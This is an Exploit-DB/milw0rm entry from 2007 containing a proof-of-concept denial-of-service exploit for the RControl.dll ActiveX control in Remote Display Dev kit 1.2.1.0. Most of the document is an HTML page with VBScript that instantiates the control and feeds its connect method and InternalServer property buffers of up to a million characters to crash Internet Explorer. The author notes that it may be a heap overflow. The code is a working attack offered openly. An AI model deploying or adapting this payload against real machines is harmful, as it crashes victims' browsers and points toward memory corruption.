Remote Display Dev kit 1.2.1.0 - 'RControl.dll' Denial of Service

EDB-ID:

3891

Author:

shinnai

Type:

dos

Platform:

Windows

Published:

2007-05-10

<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/10</b></p></span>
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 <b>RControl.dll v. 1.2.1.0 Denial of Service Exploit</b>
 url: http://www.fruit2004.com/
 price: only $20 :)

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 If you try less than 4000 chr you'll see a strange crash. It seems like a
 heap overflow in ntdll.dll but I'm really not sure of this thing :)
-----------------------------------------------------------------------------

<object classid='clsid:2A515FCD-C0E9-4F38-9C77-2949514366F2' id='target' style="width: 405px; height: 50px"></object>

<select style="width: 404px" name="Pucca">
  <option value = "Connect">Connect</option>
  <option value = "InternalServer">InternalServer</option>

  <option value = "Quoting">Quoting...</option>
</select>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
Sub tryMe
  on error resume next
   Dim MyMsg
   if Pucca.value = "Connect" then
     argCount = 5
     arg1=String(8001,"A")
     arg2=1
     arg3="default"
     arg4="default"
     arg5="default"
     target.connect arg1, arg2, arg3, arg4, arg5
   elseif Pucca.value = "InternalServer" then
     argCount = 1
     arg1=String(1000000, "A")
     target.InternalServer = arg1
   else
     MyMsg = MsgBox ("He turned around to face his mother" & vbCrLf & _
                     "To show her the wound in his breast" & vbCrLf &_
                     "That burned like a brand" & vbCrLf & _
                     "But the sword that cut him open" & vbCrLf & _
                     "Was the sword in his mother's hand", 64, "2007/05/10 - RControl 1.2")
   end if
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-05-10]